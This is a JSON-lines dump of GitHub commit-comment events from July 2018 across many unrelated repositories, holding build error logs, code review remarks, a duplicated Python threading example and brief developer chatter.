{"id":"8032833317","type":"CommitCommentEvent","actor":{"login":"stefanhusmann"},"repo":{"name":"vectorgraphics/asymptote"},"payload":{"comment":{"id":29870504,"position":null,"line":null,"path":null,"commit_id":"451a260ae50d02867c1e54726a68d8af2c55761d","created_at":"2018-07-28T20:04:01Z","updated_at":"2018-07-28T20:04:01Z","author_association":"NONE","body":"Docs won't build:\r\n\r\n``` tex\r\n\r\n./asymptote.texi:8600: Could not find image file planes for pdf.\r\n@dopdfimage ...uld not find image file #1 for pdf}\r\n                                                  @else @gdef @pdfimgext {JP...\r\n\r\n@imagexxx ...t @fi @ifpdf @dopdfimage {#1}{#2}{#3}\r\n                                                  @else @ifx @XeTeXrevision ...\r\n\r\n@image ...true @fi @else @imagexxx #1,,,,,@finish \r\n                                                  @fi \r\n<argument> @hfil @ignorespaces @image {planes}\r\n                                              @unskip @hfil \r\n@centersub ...enalty @fi @line {@kern @leftskip #1\r\n                                                  @kern @rightskip }\r\n@\\center ...{@hfil @ignorespaces #1@unskip @hfil }\r\n                                                  @let @centersub @relax \r\nl.8600 @center @image{planes}\r\n                             \r\n? \r\n' ' '\r\n"}},"created_at":"2018-07-28T20:04:01Z"}
{"id":"8032833360","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29870505,"position":null,"line":null,"path":null,"commit_id":"6685acfa85214eb3ea6810e9fb2cd41be9c40290","created_at":"2018-07-28T20:04:03Z","updated_at":"2018-07-28T20:04:03Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-565](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-565).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-565-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-28T20:04:03Z"}
{"id":"8032834818","type":"CommitCommentEvent","actor":{"login":"Saga305"},"repo":{"name":"Saga305/Python"},"payload":{"comment":{"id":29870510,"position":null,"line":null,"path":null,"commit_id":"42c4f3f7ecb6698add96642734cf4eb404ed41bd","created_at":"2018-07-28T20:05:12Z","updated_at":"2018-07-28T20:05:12Z","author_association":"OWNER","body":"import threading as th\r\n#import a timeStamp module to gettime according to the time zone\r\nimport timeStamp as ts\r\n\r\nl = []\r\nlock = th.Lock()\r\n\r\ndef update_time(timeZone):\r\n\t#lock = threading.Lock() #What if we create a lock instance here?\r\n\t#print(\"lock address: \",lock)\r\n\r\n\tprint(\"Thread {} is going to acqiure a lock\".format(th.current_thread().getName()))\r\n\r\n\t#acquiring a lock\r\n\tlock.acquire()\r\n\tprint(\"Thread {} has acquired a lock\".format(th.current_thread().getName()))\r\n\t\r\n\t#append a timestamp in a list\r\n\tl.append(ts.getTimeStamp(timeZone))\r\n\r\n\tprint(\"Thread {} is going to release a lock\".format(th.current_thread().getName()))\r\n\t#releasing a lock\r\n\tlock.release()\r\n\t\r\n \r\nif __name__ == \"__main__\":\r\n\t# creating thread AEST\r\n\taest = th.Thread(target=update_time,name=\"AEST\", args=(ts.ausZone,))\r\n\r\n\t# creating thread MMT\r\n\tmmt = th.Thread(target=update_time,name=\"MMT\", args=(ts.istZone,))\r\n\r\n\t# creating thread EST\r\n\test = th.Thread(target=update_time,name=\"EST\", args=(ts.estZone,))\r\n \r\n\t# starting thread AEST\r\n\taest.start()\r\n\r\n\t# starting thread MMT\r\n\tmmt.start()\r\n\r\n\t# starting thread EST\r\n\test.start()\r\n \r\n\t# wait until thread AEST is completely executed\r\n\taest.join()\r\n\r\n\t# wait until thread MMT is completely executed\r\n\tmmt.join()\r\n\r\n\t# wait until thread EST is completely executed\r\n\test.join()\r\n\r\n\t#Print list\r\n\tprint(l)"}},"created_at":"2018-07-28T20:05:12Z"}
{"id":"8032835211","type":"CommitCommentEvent","actor":{"login":"jimmyff"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29870514,"position":1,"line":1,"path":"analysis_options.yaml","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T20:05:31Z","updated_at":"2018-07-28T20:05:31Z","author_association":"OWNER","body":"It's your call. I personally like as many linter rules as I can that will make the code as close to the [effective dart](https://www.dartlang.org/guides/language/effective-dart) guidelines as possible. This is a matter of personal preference so your call if you would prefer to go without all the linter rules! "}},"created_at":"2018-07-28T20:05:31Z"}
{"id":"8032839456","type":"CommitCommentEvent","actor":{"login":"kernelpaniclite"},"repo":{"name":"CI-WATER/erfp_data_process_ubuntu"},"payload":{"comment":{"id":29870527,"position":null,"line":null,"path":null,"commit_id":"b5e28285303ac967989d3beba1333d83cf1252d7","created_at":"2018-07-28T20:09:06Z","updated_at":"2018-07-28T20:09:06Z","author_association":"NONE","body":"You should probably remove your login infos really from the repo and change your credentials on the server. Github has a help page for such cases: https://help.github.com/articles/removing-sensitive-data-from-a-repository/"}},"created_at":"2018-07-28T20:09:06Z"}
{"id":"8032839933","type":"CommitCommentEvent","actor":{"login":"heavysink"},"repo":{"name":"arch4edu/arch4edu"},"payload":{"comment":{"id":29870528,"position":null,"line":null,"path":null,"commit_id":"f0b0dfff36ecf94141fed644fc58af477c4dc728","created_at":"2018-07-28T20:09:29Z","updated_at":"2018-07-28T20:09:29Z","author_association":"CONTRIBUTOR","body":"什么情况...\r\n我想让qgis-git自动跟随github的更新。calil不能像lilac那样自动跟随吗？"}},"created_at":"2018-07-28T20:09:29Z"}
{"id":"8032843692","type":"CommitCommentEvent","actor":{"login":"brandon93s"},"repo":{"name":"lukesampson/scoop-extras"},"payload":{"comment":{"id":29870538,"position":5,"line":39,"path":"flutter.json","commit_id":"ce566dfd2901b854ee7495f5a4c1951df3cc1dc7","created_at":"2018-07-28T20:12:28Z","updated_at":"2018-07-28T20:12:28Z","author_association":"COLLABORATOR","body":"👍 this was done via the format script. I'll see if that can be updated. "}},"created_at":"2018-07-28T20:12:28Z"}
{"id":"8032845010","type":"CommitCommentEvent","actor":{"login":"benqiangxu"},"repo":{"name":"benqiangxu/Spoon-Knife"},"payload":{"comment":{"id":29870543,"position":null,"line":null,"path":null,"commit_id":"1f5952bc3dd65be63f6edf17fc90a9135087afe9","created_at":"2018-07-28T20:13:32Z","updated_at":"2018-07-28T20:13:32Z","author_association":"OWNER","body":"Add some more chopsticks"}},"created_at":"2018-07-28T20:13:32Z"}
{"id":"8032846142","type":"CommitCommentEvent","actor":{"login":"Saga305"},"repo":{"name":"Saga305/Python"},"payload":{"comment":{"id":29870549,"position":null,"line":null,"path":null,"commit_id":"42c4f3f7ecb6698add96642734cf4eb404ed41bd","created_at":"2018-07-28T20:14:25Z","updated_at":"2018-07-28T20:14:25Z","author_association":"OWNER","body":"import threading as th\r\n#import a timeStamp module to gettime according to the time zone\r\nimport timeStamp as ts\r\n\r\nl = []\r\nlock = th.Lock()\r\n\r\ndef update_time(timeZone):\r\n\t#lock = threading.Lock() #What if we create a lock instance here?\r\n\t#print(\"lock address: \",lock)\r\n\r\n\tprint(\"Thread {} is going to acqiure a lock\".format(th.current_thread().getName()))\r\n\r\n\t#acquiring a lock\r\n\tlock.acquire()\r\n\tprint(\"Thread {} has acquired a lock\".format(th.current_thread().getName()))\r\n\t\r\n\t#append a timestamp in a list\r\n\tl.append(ts.getTimeStamp(timeZone))\r\n\r\n\tprint(\"Thread {} is going to release a lock\".format(th.current_thread().getName()))\r\n\t#releasing a lock\r\n\tlock.release()\r\n\t\r\n \r\nif __name__ == \"__main__\":\r\n\t# creating thread AEST\r\n\taest = th.Thread(target=update_time,name=\"AEST\", args=(ts.ausZone,))\r\n\r\n\t# creating thread MMT\r\n\tmmt = th.Thread(target=update_time,name=\"MMT\", args=(ts.istZone,))\r\n\r\n\t# creating thread EST\r\n\test = th.Thread(target=update_time,name=\"EST\", args=(ts.estZone,))\r\n \r\n\t# starting thread AEST\r\n\taest.start()\r\n\r\n\t# starting thread MMT\r\n\tmmt.start()\r\n\r\n\t# starting thread EST\r\n\test.start()\r\n \r\n\t# wait until thread AEST is completely executed\r\n\taest.join()\r\n\r\n\t# wait until thread MMT is completely executed\r\n\tmmt.join()\r\n\r\n\t# wait until thread EST is completely executed\r\n\test.join()\r\n\r\n\t#Print list\r\n\tprint(l)"}},"created_at":"2018-07-28T20:14:25Z"}
{"id":"8032848046","type":"CommitCommentEvent","actor":{"login":"jakeddavis"},"repo":{"name":"jakeddavis/CPanel"},"payload":{"comment":{"id":29870556,"position":38,"line":312,"path":"CPanel/geometry.h","commit_id":"81b80e6a0878b338ea0e65d786c290310aef19de","created_at":"2018-07-28T20:15:53Z","updated_at":"2018-07-28T20:15:53Z","author_association":"OWNER","body":"This is what is currently used to control which scheme, constant or linear doublet, is used. If inMach is less than 1, the constant scheme will be used, and if it's greater than 1, the linear scheme will be used. This is done for convenience during development as it provides a quick and easy way to switch between the two without having to change the input file. This will eventually be replaced by the Mach value in the input file."}},"created_at":"2018-07-28T20:15:53Z"}
{"id":"8032850262","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29870562,"position":29,"line":1861,"path":"src/dump.c","commit_id":"2837c244e62b6590b020f999bdd8d16d44a8d9b2","created_at":"2018-07-28T20:17:43Z","updated_at":"2018-07-28T20:17:43Z","author_association":"MEMBER","body":"I don't believe that `field-type` is assigned yet here (in somewhat rare cases)"}},"created_at":"2018-07-28T20:17:43Z"}
{"id":"8032850467","type":"CommitCommentEvent","actor":{"login":"sudevmandal"},"repo":{"name":"sudevmandal/gidkube"},"payload":{"comment":{"id":29870565,"position":null,"line":null,"path":null,"commit_id":"4fc683db024410035b6bba5f55194c5fb2cee882","created_at":"2018-07-28T20:17:53Z","updated_at":"2018-07-28T20:17:53Z","author_association":"OWNER","body":"jhjhs"}},"created_at":"2018-07-28T20:17:53Z"}
{"id":"8032851497","type":"CommitCommentEvent","actor":{"login":"krulik"},"repo":{"name":"meir-ellenberg/Plex"},"payload":{"comment":{"id":29870568,"position":76,"line":76,"path":"index.html","commit_id":"639fdb40874169fe47b03c807cf8052efd7c0fa8","created_at":"2018-07-28T20:18:44Z","updated_at":"2018-07-28T20:18:44Z","author_association":"NONE","body":"You can't put an `<a>` inside `<ul>`:\r\nhttp://devdocs.io/html/element/ul"}},"created_at":"2018-07-28T20:18:44Z"}
{"id":"8032851657","type":"CommitCommentEvent","actor":{"login":"hayatigonultas"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29870571,"position":null,"line":null,"path":null,"commit_id":"d6d9374b66ccfc861d5ed1bfcd30ac949f2fe4ce","created_at":"2018-07-28T20:18:51Z","updated_at":"2018-07-28T20:18:51Z","author_association":"NONE","body":"Hi @fichtner  , any chances this fix also gets into next release (18.1.x)?\r\n\r\nThanks"}},"created_at":"2018-07-28T20:18:51Z"}
{"id":"8032853437","type":"CommitCommentEvent","actor":{"login":"krulik"},"repo":{"name":"meir-ellenberg/Plex"},"payload":{"comment":{"id":29870578,"position":133,"line":133,"path":"index.html","commit_id":"639fdb40874169fe47b03c807cf8052efd7c0fa8","created_at":"2018-07-28T20:20:19Z","updated_at":"2018-07-28T20:20:19Z","author_association":"NONE","body":"The quotes section contains a quote for each company"}},"created_at":"2018-07-28T20:20:19Z"}
{"id":"8032854272","type":"CommitCommentEvent","actor":{"login":"GillesHaverbeke"},"repo":{"name":"HackYourFutureBelgium/github-explorer-Mohammed-radwan-1"},"payload":{"comment":{"id":29870582,"position":null,"line":null,"path":null,"commit_id":"291542185db43b495e773e7895c96806ccc242dc","created_at":"2018-07-28T20:20:57Z","updated_at":"2018-07-28T20:20:57Z","author_association":"NONE","body":"Some comment on your homework.\r\n\r\nFirst of all: Great that you are trying to build the whole solution with your own code! This is the best way to learn all the required elements and to be able to build something from scratch.\r\n\r\nThen some feedback on the code:\r\n- Line 44 contains a \"hardcoded\" url to fetch the contributors of a specific repo. The position of this code is wrong. What you probably missed is that in the initial URL that retrieves the list of repo's, within each repo details a URL is also available that should be used to retrieve the contributors of this specific URL. What should happen is that when a user selects a specific repo (so within the change eventhandler function you start with on line 77) you should get the URL from the repo data and call it at that time. \r\n- The data from line 67-75 and the lines below there is almost duplicate it would be better to put that in a separate function to prevent duplication. "}},"created_at":"2018-07-28T20:20:57Z"}
{"id":"8032855031","type":"CommitCommentEvent","actor":{"login":"oswaldius"},"repo":{"name":"oswaldius/hello-world"},"payload":{"comment":{"id":29870584,"position":null,"line":null,"path":null,"commit_id":"d5e835c64f56aba1ea0d7a20ecf5ad4ea83c7a7a","created_at":"2018-07-28T20:21:38Z","updated_at":"2018-07-28T20:21:38Z","author_association":"OWNER","body":"Still following the breadcrumbs, don't know where this is leading"}},"created_at":"2018-07-28T20:21:38Z"}
{"id":"8032856480","type":"CommitCommentEvent","actor":{"login":"krulik"},"repo":{"name":"meir-ellenberg/Plex"},"payload":{"comment":{"id":29870588,"position":166,"line":166,"path":"index.html","commit_id":"639fdb40874169fe47b03c807cf8052efd7c0fa8","created_at":"2018-07-28T20:22:51Z","updated_at":"2018-07-28T20:22:51Z","author_association":"NONE","body":"I'd think about structuring this section differently - think about what the main message and important parts are. I think maybe the title should be a heading element (not `<p>`). Also you can use the `<data>` element for the ratings: http://devdocs.io/html/element/data"}},"created_at":"2018-07-28T20:22:51Z"}
{"id":"8032856746","type":"CommitCommentEvent","actor":{"login":"skybrian"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29870589,"position":1,"line":1,"path":"analysis_options.yaml","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T20:23:07Z","updated_at":"2018-07-28T20:23:07Z","author_association":"NONE","body":"Okay, Effective Dart guidelines sounds good to me.\r\n\r\n"}},"created_at":"2018-07-28T20:23:07Z"}
{"id":"8032856992","type":"CommitCommentEvent","actor":{"login":"krulik"},"repo":{"name":"meir-ellenberg/Plex"},"payload":{"comment":{"id":29870590,"position":186,"line":186,"path":"index.html","commit_id":"639fdb40874169fe47b03c807cf8052efd7c0fa8","created_at":"2018-07-28T20:23:18Z","updated_at":"2018-07-28T20:23:18Z","author_association":"NONE","body":"Should be a list"}},"created_at":"2018-07-28T20:23:18Z"}
{"id":"8032864581","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29870611,"position":47,"line":47,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-28T20:29:31Z","updated_at":"2018-07-28T20:29:31Z","author_association":"CONTRIBUTOR","body":"MacPorts creates this directory (and other directories that are mentioned in `man porthier`) for you automatically."}},"created_at":"2018-07-28T20:29:31Z"}
{"id":"8032864796","type":"CommitCommentEvent","actor":{"login":"TomTheCreator"},"repo":{"name":"Plajer-Lair/Village_Defense"},"payload":{"comment":{"id":29870612,"position":null,"line":null,"path":null,"commit_id":"582f0e78d0dea72ca05062212b6c4e84a57f87b6","created_at":"2018-07-28T20:29:43Z","updated_at":"2018-07-28T20:29:43Z","author_association":"COLLABORATOR","body":"@Plajer Just curious. Why did you decide to remove Lombok?"}},"created_at":"2018-07-28T20:29:43Z"}
{"id":"8032866560","type":"CommitCommentEvent","actor":{"login":"nilabjaball"},"repo":{"name":"MicrosoftDocs/azure-docs"},"payload":{"comment":{"id":29870623,"position":null,"line":null,"path":null,"commit_id":"7e144cdb01cd09b6ab01d92d617baa0943ddb982","created_at":"2018-07-28T20:30:56Z","updated_at":"2018-07-28T20:30:56Z","author_association":"NONE","body":"This code doesn't run with ADAL 3.0. I had to downgrade to 2.XX to get it working. Can you fix it the tokencrdedential breaks. "}},"created_at":"2018-07-28T20:30:56Z"}
{"id":"8032867443","type":"CommitCommentEvent","actor":{"login":"CertifiedMrLuke"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29870627,"position":null,"line":null,"path":null,"commit_id":"c556a0838b795c8aeb0ecd8e9080fd0b0ab81c7d","created_at":"2018-07-28T20:31:35Z","updated_at":"2018-07-28T20:31:35Z","author_association":"NONE","body":"utACK c556a08"}},"created_at":"2018-07-28T20:31:35Z"}
{"id":"8032868052","type":"CommitCommentEvent","actor":{"login":"CertifiedMrLuke"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29870628,"position":null,"line":null,"path":null,"commit_id":"c556a0838b795c8aeb0ecd8e9080fd0b0ab81c7d","created_at":"2018-07-28T20:32:03Z","updated_at":"2018-07-28T20:32:03Z","author_association":"NONE","body":"[github.com/mrCertified](url)"}},"created_at":"2018-07-28T20:32:03Z"}
{"id":"8032871037","type":"CommitCommentEvent","actor":{"login":"bbhopesh"},"repo":{"name":"sgupta229/EmailProject"},"payload":{"comment":{"id":29870636,"position":null,"line":null,"path":null,"commit_id":"3d9d46eb0c724e8afa487fdc44c91a93aec8b4f6","created_at":"2018-07-28T20:34:34Z","updated_at":"2018-07-28T20:34:34Z","author_association":"NONE","body":"We don't need this. Gradle is very smart in doing incremental builds."}},"created_at":"2018-07-28T20:34:34Z"}
{"id":"8032871381","type":"CommitCommentEvent","actor":{"login":"skybrian"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29870638,"position":12,"line":10,"path":"pubspec.yaml","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T20:34:52Z","updated_at":"2018-07-28T20:34:52Z","author_association":"NONE","body":"I think it's okay as-is.\r\n\r\nIt looks like pub will automatically ignore the new version for Dart 1 due to the SDK constraint [1]. If that's correct, Dart 1 users don't need to pin the previous version; they will never see the new version. (And even if they did, build_runner is a dev dependency so library users wouldn't see it anyway.)\r\n\r\n[1] https://www.dartlang.org/tools/pub/pubspec#sdk-constraints\r\n"}},"created_at":"2018-07-28T20:34:52Z"}
{"id":"8032873322","type":"CommitCommentEvent","actor":{"login":"olasalem"},"repo":{"name":"moemen95/PyTorch-Project-Template"},"payload":{"comment":{"id":29870648,"position":null,"line":null,"path":null,"commit_id":"4d2f7bea9819fe2e5e25153c5cc87c8b5f35f4b8","created_at":"2018-07-28T20:36:27Z","updated_at":"2018-07-28T20:36:27Z","author_association":"NONE","body":"Very good and comprehensive. Thanks for detailed documentation!"}},"created_at":"2018-07-28T20:36:27Z"}
{"id":"8032874035","type":"CommitCommentEvent","actor":{"login":"ImMorpheus"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":29870650,"position":1,"line":1,"path":"src/main/java/org/spongepowered/common/item/inventory/query/result/QueryResultAdapter.java","commit_id":"66573bf79ef699981dfd934c7c16aeb987df047f","created_at":"2018-07-28T20:37:03Z","updated_at":"2018-07-28T20:37:03Z","author_association":"CONTRIBUTOR","body":"@Faithcaio License"}},"created_at":"2018-07-28T20:37:03Z"}
{"id":"8032877446","type":"CommitCommentEvent","actor":{"login":"jakeddavis"},"repo":{"name":"jakeddavis/CPanel"},"payload":{"comment":{"id":29870665,"position":null,"line":null,"path":null,"commit_id":"81b80e6a0878b338ea0e65d786c290310aef19de","created_at":"2018-07-28T20:40:06Z","updated_at":"2018-07-28T20:40:06Z","author_association":"OWNER","body":"Everything seems to be working fine, and the code was meticulously combed through, but there remains a difference in the results output by the original constant doublet scheme, and the new linear doublet scheme.\r\n\r\nThere are a few things missing from this implementation as well as a few caveats:\r\n- Far field calcs for linear scheme weren't working properly, so all calcs are done using the near field scheme\r\n- Can't yet do lifting bodies--difficulty in organization of body and wake nodes not yet resolved\r\n- Scheme control done in geometry.h by changing inMach at line 312. See comment above\r\n- Output data is not all formatted correctly due to much of the data now being stored in nodes, and not panels. Velocity and Cp data is still output correctly as these are stored in panels still. This will be fixed in the future.\r\n\r\nThe difference in results between the constant and linear schemes is illustrated below for a generic ellipsoid at no angle of attack or sideslip, and a freestream velocity of 20 ft/s. The ellipsoid is made up of just over 5000 panels. You'll notice differences at the extremes of the Cp legend.\r\n\r\nHere are the results from the constant doublet scheme:\r\n![const](https://user-images.githubusercontent.com/32473437/43360491-f1fae4ce-926a-11e8-8a0e-93f1e81ba306.png)\r\n\r\nAnd the linear doublet scheme:\r\n![lin](https://user-images.githubusercontent.com/32473437/43360504-130a0a00-926b-11e8-8296-fa03bbad5b2c.png)\r\n"}},"created_at":"2018-07-28T20:40:06Z"}
{"id":"8032878944","type":"CommitCommentEvent","actor":{"login":"ashish1997it"},"repo":{"name":"ashish1997it/code-magic"},"payload":{"comment":{"id":29870672,"position":5,"line":6,"path":"note3.txt","commit_id":"597f69c53141d7622197836f33e0f32591664762","created_at":"2018-07-28T20:41:19Z","updated_at":"2018-07-28T20:41:19Z","author_association":"OWNER","body":"extra txt\r\n"}},"created_at":"2018-07-28T20:41:19Z"}
{"id":"8032880463","type":"CommitCommentEvent","actor":{"login":"CertifiedMrLuke"},"repo":{"name":"CertifiedrLi/SRW"},"payload":{"comment":{"id":29870677,"position":null,"line":null,"path":null,"commit_id":"6af042462fa2e5d15548836bec784ff82b888f7d","created_at":"2018-07-28T20:42:34Z","updated_at":"2018-07-28T20:42:34Z","author_association":"NONE","body":"UtACK 6af0424\r\n"}},"created_at":"2018-07-28T20:42:34Z"}
{"id":"8032882073","type":"CommitCommentEvent","actor":{"login":"sunag"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":29870682,"position":11,"line":15,"path":"examples/js/nodes/utils/ColorSpaceNode.js","commit_id":"8f95052230c154cf846b550243e4ae22ee472969","created_at":"2018-07-28T20:43:56Z","updated_at":"2018-07-28T20:43:56Z","author_association":"CONTRIBUTOR","body":"Niice! Only here if you could replace to `ColorSpaceNode.LINEAR_TO_LINEAR`"}},"created_at":"2018-07-28T20:43:56Z"}
{"id":"8032882580","type":"CommitCommentEvent","actor":{"login":"olasalem"},"repo":{"name":"moemen95/PyTorch-Project-Template"},"payload":{"comment":{"id":29870683,"position":null,"line":null,"path":null,"commit_id":"b6f564063765157c5f8e336f40ce0c5e14043a48","created_at":"2018-07-28T20:44:22Z","updated_at":"2018-07-28T20:44:22Z","author_association":"NONE","body":"really good initial structure\r\njust few tips:\r\n-use a logging library for printing.\r\n-try to divide the changes into separate commits for each module for better review.\r\n-organise the classes into packages and modules"}},"created_at":"2018-07-28T20:44:22Z"}
{"id":"8032886305","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29870695,"position":null,"line":null,"path":null,"commit_id":"4744480ad6b23117b2ecefd488982dc8097a05eb","created_at":"2018-07-28T20:47:30Z","updated_at":"2018-07-28T20:47:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Employee DOA](https://trello.com/c/1cR5ja19/13-implement-employee-doa)"}},"created_at":"2018-07-28T20:47:30Z"}
{"id":"8032888513","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"oe-alliance/AutoBouquetsMaker"},"payload":{"comment":{"id":29870705,"position":null,"line":null,"path":null,"commit_id":"b0d064606c0d38f879ab9aeed5cd0747421969a4","created_at":"2018-07-28T20:49:20Z","updated_at":"2018-07-28T20:49:20Z","author_association":"MEMBER","body":"Hopefully this is correct.\r\nhttps://github.com/oe-alliance/e2openplugin-CrossEPG/blob/master/src/common/dvb/dvb.c#L19-L31\r\n"}},"created_at":"2018-07-28T20:49:20Z"}
{"id":"8032890977","type":"CommitCommentEvent","actor":{"login":"steven-a-b"},"repo":{"name":"laurentalacoque/TouchSelfie"},"payload":{"comment":{"id":29870709,"position":null,"line":null,"path":null,"commit_id":"266c50b0c14a66442571a5d80596a602b5b5e896","created_at":"2018-07-28T20:51:05Z","updated_at":"2018-07-28T20:51:05Z","author_association":"NONE","body":"hello, everything is working fine except the layout of the icons on my screen. how can I control the position of the icons relative to the overall screen size and the image? I am using a 1920 x 1080 screen. at startup, the icons are in the upper left of the screen. Once the picture is snapped, the animated gif icon is over the image. \r\nthank you"}},"created_at":"2018-07-28T20:51:05Z"}
{"id":"8032892459","type":"CommitCommentEvent","actor":{"login":"dginovker"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29870715,"position":null,"line":null,"path":null,"commit_id":"d2186b3db61a9d4dc2d4a6211573790d9e34bf58","created_at":"2018-07-28T20:52:19Z","updated_at":"2018-07-28T20:52:19Z","author_association":"NONE","body":"Seriously? You guys are that upset at Cøbra for not denouncing Bitcoin Cash?"}},"created_at":"2018-07-28T20:52:19Z"}
{"id":"8032894150","type":"CommitCommentEvent","actor":{"login":"CFKevinRef"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29870725,"position":null,"line":null,"path":null,"commit_id":"0d43751cabad7270d5f773005b3b20d17e078b62","created_at":"2018-07-28T20:53:49Z","updated_at":"2018-07-28T20:53:49Z","author_association":"CONTRIBUTOR","body":"Actually I would think that this merged PR should take care of things: https://github.com/Microsoft/react-native-code-push/pull/1219\r\n\r\nWhat version of CodePush and the Android Gradle Plugin are you using?"}},"created_at":"2018-07-28T20:53:49Z"}
{"id":"8032895092","type":"CommitCommentEvent","actor":{"login":"almchung"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29870730,"position":27,"line":811,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-28T20:54:38Z","updated_at":"2018-07-28T20:54:38Z","author_association":"CONTRIBUTOR","body":"`typeof` would return `'object'` for a p5.Color instance in this case"}},"created_at":"2018-07-28T20:54:38Z"}
{"id":"8032895399","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29870733,"position":14,"line":15,"path":"math/vdt/Portfile","commit_id":"5b124d981def4108ace2e9a21c053ae5ee00ef7d","created_at":"2018-07-28T20:54:54Z","updated_at":"2018-07-28T20:54:54Z","author_association":"CONTRIBUTOR","body":"> a small fix for OSX 10.11 that is not (yet) in the main repo\r\n\r\nHave you reported this to the developers? I didn't find an upstream issue or PR for it."}},"created_at":"2018-07-28T20:54:54Z"}
{"id":"8032896020","type":"CommitCommentEvent","actor":{"login":"almchung"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":29870735,"position":28,"line":812,"path":"lib/addons/p5.dom.js","commit_id":"9861416d4fb085cb891d5cd1a7be1070a68b2c20","created_at":"2018-07-28T20:55:26Z","updated_at":"2018-07-28T20:55:26Z","author_association":"CONTRIBUTOR","body":"use `.toString('#rrggbb')` for the correct format"}},"created_at":"2018-07-28T20:55:26Z"}
{"id":"8032900007","type":"CommitCommentEvent","actor":{"login":"cjones051073"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29870745,"position":14,"line":15,"path":"math/vdt/Portfile","commit_id":"5b124d981def4108ace2e9a21c053ae5ee00ef7d","created_at":"2018-07-28T20:58:40Z","updated_at":"2018-07-28T20:58:40Z","author_association":"CONTRIBUTOR","body":"No, not yet. The fix I deployed is not yet ready to be sent upstream. I need to do some work to figure out what exactly the problem is, and why it only affects 10.11. I just haven't gotten around to it yet..."}},"created_at":"2018-07-28T20:58:40Z"}
{"id":"8032902563","type":"CommitCommentEvent","actor":{"login":"tanertas"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29870755,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-28T21:00:27Z","updated_at":"2018-07-28T21:00:27Z","author_association":"CONTRIBUTOR","body":"Glad you don't."}},"created_at":"2018-07-28T21:00:27Z"}
{"id":"8032902608","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29870756,"position":null,"line":null,"path":null,"commit_id":"07b3b10b1f9dd77ea50e087e874022ac81aa3cfd","created_at":"2018-07-28T21:00:29Z","updated_at":"2018-07-28T21:00:29Z","author_association":"COLLABORATOR","body":"I'm in favor of having four complete tanks like we have now. I thought you wanted to do something else.\r\n\r\nI'm on the fence about jettisoning panels. I'm envisioning headaches getting it to work right. We don't simulate atmospheric effects from friction heating.\r\n\r\nAltas V Heavy is limited by the too small Common Centaur. The CCB stage completely orbits Centaur and Payload, so payload to GTO is limited by what the Centaur can move there from parking orbit, not what the CCB can put there. A direct to GTO launch opens things up a bit but you can't always do that. Were it allowed to evolve it would have an upper stage 3x the size of the Common Centaur. Which we can build, but 12 minute burns with twin RL-10s don't work, it needs more power. Not suggesting you need to drop everything and solve this problem, just pointing it out."}},"created_at":"2018-07-28T21:00:29Z"}
{"id":"8032902923","type":"CommitCommentEvent","actor":{"login":"freekmurze"},"repo":{"name":"spatie/laravel-activitylog"},"payload":{"comment":{"id":29870757,"position":16,"line":15,"path":"src/helpers.php","commit_id":"d8b9d060383cbd2abb961b5c1d187edb6183ec14","created_at":"2018-07-28T21:00:42Z","updated_at":"2018-07-28T21:00:42Z","author_association":"MEMBER","body":"Without this call `ActivityLogStatus` won't be resolved correctly. Try to remove the call and run the test suite to see that wrong behaviour."}},"created_at":"2018-07-28T21:00:42Z"}
{"id":"8032911356","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29870776,"position":null,"line":null,"path":null,"commit_id":"14586d68959fa0f386f07a3bacd1cbef75b97b98","created_at":"2018-07-28T21:07:41Z","updated_at":"2018-07-28T21:07:41Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-28T21:07:41Z"}
